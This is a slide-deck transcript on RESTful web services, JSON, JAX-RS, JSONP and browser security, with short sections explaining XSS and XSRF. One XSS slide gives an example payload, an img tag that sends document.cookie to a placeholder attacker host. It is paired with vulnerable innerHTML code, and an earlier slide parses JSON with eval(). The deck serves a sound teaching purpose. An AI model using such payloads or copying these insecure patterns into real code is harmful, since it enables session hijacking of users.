1 / 43

Restful Web Services

Restful Web Services. By Loukik Purohit & Rohit Ghatol. Web Service. Browser. Messages(xml/json ). Desktop. CricInfo. Mobile. Using Browser. Cab Booking. Plane Booking. Hotel Booking. Vacation Subsystem. User Intervention. Automated. Cab Booking. Plane Booking. SMS/Email.

cid
Télécharger la présentation

Restful Web Services

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Restful Web Services By Loukik Purohit & Rohit Ghatol

  2. Web Service Browser Messages(xml/json ) Desktop CricInfo Mobile

  3. Using Browser Cab Booking Plane Booking Hotel Booking Vacation Subsystem User Intervention

  4. Automated Cab Booking Plane Booking SMS/Email Hotel Booking Vacation Subsystem Machines interacting with each other

  5. Rest in terms of Layman HR Accounts Admin

  6. Organized structure To get address of user 1 , go to : \Organisation\Users\1\address

  7. Same analogy applies to Web • Request to get all users http://xyz.com/users • Request to get user 1 http://xyz.com/users/1 • Request to get address of user 1 http://xyz.com/users/1/address

  8. Request-Response GET Response <users> <id>1</id> <name>Loukik</address> <address>Pune</address> <skill>java</skill> </id> <id>2</id> <name>...</address> <address>…</address> <skill>…</skill> </id> </users> GETRequest GET /users/1 HTTP/1.1 Host: xyz.com Accept: application/xml

  9. Request-Response POST Request GET /users HTTP/1.1 Host: xyz.com Content Type: application/xml Accept: application/xml <users> <name>Rohit</address> <address>Pune</address> <skill>C++</skill> </id> </users> POST Response <result> <id>3</id> </result>

  10. HTTP http://xyz.com/services/users HTTP Headers Method:PUT Accept:application/xml Content-Type:application/xml HTTP Body <users> <name>Rohit</address> <address>Pune</address> <skill>C++</skill> </id> </users>

  11. Four verbs for every noun • http://example.com/customer/123 GET POST DELETE PUT

  12. JSON Can Data be Represented in form of List and a Map?? Here’s JSON var myObject = eval('(' + myJSONtext + ')');

  13. JSON Parser

  14. How JSON looks like var result= { "users":[{ "id":"1", "name":"loukik", "address":"Pune", "skill":"java" }, { "id":"2", "name":"rohit", "address":"Pune", "skill":"C++“ } ] } Accessing json in javascript code result.users[0].name=“loukik”

  15. REST

  16. Programmable Web Your Source to 3000+ Web Service APIs

  17. programmableweb.com

  18. Implement Restful Webservice Write a Servlet Implement doGet, doPost, doDelete Write business logic Create your Messages, that too JSON

  19. JAX-RS To rescue Marrying to API Servlet EJB Being POJO (Single) is Great! JAX-RS

  20. JAX-RS More info at http://java.sun.com/javaee/6/docs/tutorial/doc/giepu.html JSR 311: JAX-RS

  21. JAX-RS Flow HTTP Request JSON POJO Model JAX-RS Servlet JAXB-@XMLRootElement Business Logic HTTP Response POJO Model JSON

  22. Spring REST • Based on Spring MVC

  23. Spring REST Negotiated view-based rendering HTTP message converters

  24. Enunciate Your Web service API Your Web service API + Full HTML documentation + Client-side libraries Enunciate

  25. Java Doc C JAX-RS ObjC POJO Client SOAP Comm .Net GWT AMF Java Json What does Enunciate do for me?

  26. Enunciate • Enunciate is an engine for dramatically enhancing your Java Web service API. • Enunciate is primarily a build-time tool. • Develop your Web service API. • Attach Enunciate to your build process.

  27. Cross Site Scripting Single Origin Policy maps.google.com http://geochirp.com Ajax Calls twitter.com

  28. Single Origin Policy Imposed by Browser Ajax Restrictions Accessing iFrame’s DOM http://www.abc.com http://xyz.com ABC.com Iframe JavaScript XYZ.com

  29. So How to do Mashups? Use Proxy http://geochirp.com/proxy P R O X Y maps.google.com http://geochirp.com twitter.com

  30. So How to do Mashups? Use JSONP maps.google.com http://geochirp.com JSONP Call twitter.com JSONP Call

  31. What is JSONP? ABC.com ABC.com Static Script http://xyz.com/script.js XYZ.com XYZ.com JS Including Scripts hosted on other domains is allowed AJAX Call Not Allowed By Browser

  32. What is JSONP? ABC.com ABC.com Dynamic Script http://xyz.com/services/users/1?callback=myfun XYZ.com XYZ.com JS Including Scripts hosted on other domains is allowed AJAX Call Not Allowed By Browser

  33. JSONP Explained http://xyz.com/services/users/1?callback=myfunc JSON JSONP • { • "id":"1", • "name":"loukik", • "address":"Pune", • "skill":"java“ • } • myfunc({ • "id":"1", • "name":"loukik", • "address":"Pune", • "skill":"java“ • }); Single Origin Policy No Such Restriction

  34. JSONP Code Example

  35. <html> <head> <script> function myfunc(data){ table.update(data); } </script> </head> <body> <table> <!-- employee table --> <tr><td>Name </td><td> Address </td><td> Role</td></tr> <tr><td>Rohit </td><td> Pune </td><td> Architect</td></tr> <tr><td>Loukik </td><td> Pune </td><td>Geek</td></tr> </table> <button id="add employee" >Add </button> <button id="next100" >NExt 100</button> <script src="http://xyz.com/services/fetchemployess?page=1&jsonp=myfunc"></script> </body> </html>

  36. XSS Attacker <script> attack script</script> Login Hacked!!! ScrapBook WebSite User

  37. How to do XSS? What if I put an html with some JavaScript here? Server needs an XSS Vulnerability Say Dev uses div.innerHTML in code TextArea function postScrap(){ div.innerHTML = textarea.value; } Post DIV

  38. How to do XSS? Server needs an XSS Vulnerability Say Dev uses div.innerHTML in code <h1>Look at this cool image</h1> <imgsrc='http://hack.com/?cookie=" + encodeURI(document.cookie)'> </img> function postScrap(){ div.innerHTML = textarea.value; }

  39. XSRF • Cross Site Request Forgery. • Unauthorized commands are transmitted from a user that the website trusts. • Exploits the trust that a site has in a user's browser.

  40. XSRF User Login Opens Mail Send Mail with Script ScrapBook WebSite Hacked!!! Attacker

  41. How to do XSRF What if I made you visit a page which uses your session to do hack? Browser holds your sessions Is it Possible?

  42. Aye Mate! How come I can use Google + and Facebook Like here?

More Related